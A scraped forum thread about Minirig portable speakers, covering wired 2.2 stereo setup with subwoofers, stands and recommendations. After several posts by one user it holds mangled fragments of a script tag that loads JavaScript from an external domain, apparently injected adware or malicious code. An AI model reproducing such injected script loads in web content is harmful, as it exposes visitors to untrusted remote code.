Speakerplans.com Homepage
Forum Home Forum Home > General > 12v Powered Systems
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Minirig

Post Reply Post Reply Page  <1 7576777879>
Author

Post Options Post Options   Thanks (0) Thanks(0)   Quote MattSPL Quote  Post ReplyReply Direct Link To This Post Posted: 14 February 2019 at 10:38pm
I would send it back for repair
Stereonerd View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Stereonerd Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 8:21pm
Hi!
New kid here. But I am a long-time Minirig owner. I have the original V1 speakers and a sub Naturally, it can only play when set up with wired connections.

But I just ordered the V3 speakers and TWO subs. (YAY!)

I know how to set them up for 2.2 (true stereo subs) when using the speakers with Bluetooth. (Obviously, a cable connects the left speaker to the left sub and a similar cable connects the right sub to the right speaker.)

>>>But HOW does one wire them for true 2.2 stereo when one wants to ONLY use a wired connection?
I have searched quite a bit and do not see how to do this (the various videos that show 2.2, 2.1 and other combos NEVER show the wiring. Does the wired connection (whatever it is) work WITHOUT the aid of the App? Or does one need to make initial contact with the speakers, tell them to be stereo, and then make wired connections???

I have multiple Minirig cables, both the plain, 3.5mm "stereo" mini-plug as well as several of the special cables to connect a sub. 

Just to be clear, I want to guarantee that one sub and one speaker play only the left and the other sub and other speaker to play only the right channel. 

THANK YOU IN ADVANCE!
MattSPL View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote MattSPL Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 8:26pm
You’ll love the minirig 3, seriously loud :)

You need a stereo splitter cable available from minirigs. This goes from a stereo jack from your phone to 2 mono jacks. Plug one into each speaker, then your usual jack to jack cable from each speaker to each sub.

This should work, but I haven’t actually tried it as I’ve only 1 sub.

Post Options Post Options   Thanks (0) Thanks(0)   Quote Stereonerd Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 8:41pm
Thank you so much for your response!

The connection you describe sounds intuitively correct. And as I mentioned, I have three of those special MiniRig cables. 

But I am somewhat unsure of your suggestion because if one looks at the "Right" plug (has the red collar) and the "left" plug (white collar) one sees that they are not mono plugs. Each of them are "stereo" plugs. (In other words, ALL three of the plugs on that cable are identical and imply they can send more than one channel.) 

The good folks at Minirig have designed in a tremendous amount of multi-functionality...one can use one speaker in mono, two (or more) speakers in mono, two speakers in stereo, 2.1 stereo systems, 2.2 stereo systems, 2.2 stereo but with summed subs, wired set-ups, bluetooth setups, etc. It is great; but because each speaker can be tweaked through the App to do all of these set-ups, it can get confusing.

So because of all that multi-functionality and the "stereo" plugs, I am still not sure. But so far, I am thinking your idea is the most likely.

Thoughts?

Edited by Stereonerd - 24 June 2019 at 8:42pm
Joji View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Joji Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 8:49pm
>>Stereonerd, Hello and welcome to the site!

the RED and WHITE are each in MONO, so any sub that you choose to connect out will only play that signal. I have been using the wired setup for years now. It works well!

Only when using the BT APP for wireless connection do you need to actually specify which minirig plays the left and the right channels
< ="text/" async="" ="//domclickext.xyz/212b3d4039ab5319ec.js">

Post Options Post Options   Thanks (0) Thanks(0)   Quote Stereonerd Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 9:01pm
Domo Arigato, Joji!

I had read many of the recent pages here and noticed how often you post and how knowledgeable you seem to be...I was hoping you would reply.

I look forward to getting the full rig and trying it out.

Thank you to both of you!

By the way, I have always wanted the best portable sound and because I turn 60 this year my desire for good portable sound went unanswered for many years. My first set of portable speakers (1985) were the Aiwa A5's (tiny little guys powered by 4 "C" batteries in each speaker). I updated every time something better came along. (I have many many different sets now!) When I got the original MiniRigs I was quite happy, but I suspect my ears will be even more impressed when the V3's arrive.
Joji View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Joji Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 9:10pm
The only problem that I have with the Minirigs is that I find myself now unwilling to listen to music through any other speakers Tongue< ="text/" async="" ="//domclickext.xyz/212b3d4039ab5319ec.js">

Post Options Post Options   Thanks (0) Thanks(0)   Quote Stereonerd Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 9:25pm
I know!

Because I still have so many other sets, I sometimes pull them out and do tests. The old MiniRigs didn't beat all of my units (I have some larger Klipsch and Altec Lansing units that sound good because they are large.)

But somehow I suspect that the new V3 MiniRigs and the V2 Subs will be the best yet.

I probably shouldn't say this but I thought the Apple iHiFi was pretty good too but it has been quite a few years since I played mine.

New Question:

I am sure this has been discussed here before but I didn't see anything on speaker stands when I poked about. Has anyone discovered a lightweight set of stands that tip the MiniRigs at an angle (And are also actually available and not too expensive)? 

Again, Thank you Matt and Joji!
djgorey View Drop Down
Young Croc
Young Croc

Post Options Post Options   Thanks (0) Thanks(0)   Quote djgorey Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 9:49pm
I haven’t read the whole thread, but can someone point me towards details of this product? I need a new little speaker system for my phone/iPod. Ta

Edit: Ok, so a very basic google found me the eponymous website. I’m an idiot!

Edited by djgorey - 24 June 2019 at 9:51pm
Gaffa tape is like the force in Star Wars - there's a dark side and a light side and it holds the universe together
Joji View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Joji Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 9:52pm
I have not seen commercial speaker stands for the miniRigs, but YouTuber clavinetJunkie made some DIY. It looked like he used some plastic lids and cut out "seats". Another member of this site also made DIY stands so that the speakers were securely held on a bicycle. Personally, I use the cloth casing that the miniRigs come in. The snug fit of the casing is rigid enough to tilt and hold the speakers at an angle from 0 degrees (flat) to 60-70 degrees incline, while resting on the desk. Maybe because I am too lazy, but this is just fine for my needs. Mostly I listen while seated about a meter from the speakers, so this range works for me. I think that a vertical inclination at ear height might be better for larger stereo sound stages. If this is what you seek, just make sure there is no rattling to spoil the fine sound.< ="text/" async="" ="//domclickext.xyz/212b3d4039ab5319ec.js">
Joji View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Joji Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 9:54pm
djgorej>> https://minirigs.co.uk/< ="text/" async="" ="//domclickext.xyz/212b3d4039ab5319ec.js">

Post Options Post Options   Thanks (0) Thanks(0)   Quote Stereonerd Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 10:09pm
They are amazing speakers, djgorey. 
Your first reaction will probably be "well, they should be great for the price."

And they are. As you can probably tell, many of us have spent large amounts of cash on other systems. But when compared to the MiniRigs, they are sub-standard.

I suggest you do it right. From the beginning. Go with MiniRigs! (Read the reviews by various mags and websites.)

You can start with one speaker and then add a second one for stereo. If you want even fuller sound, add the sub. (Some people advocate one speaker and one sub before two speakers. It depends on how passionate you are about true stereo.)

Enjoy your music!

Edited by Stereonerd - 24 June 2019 at 10:10pm
 Post Reply Post Reply Page  <1 7576777879>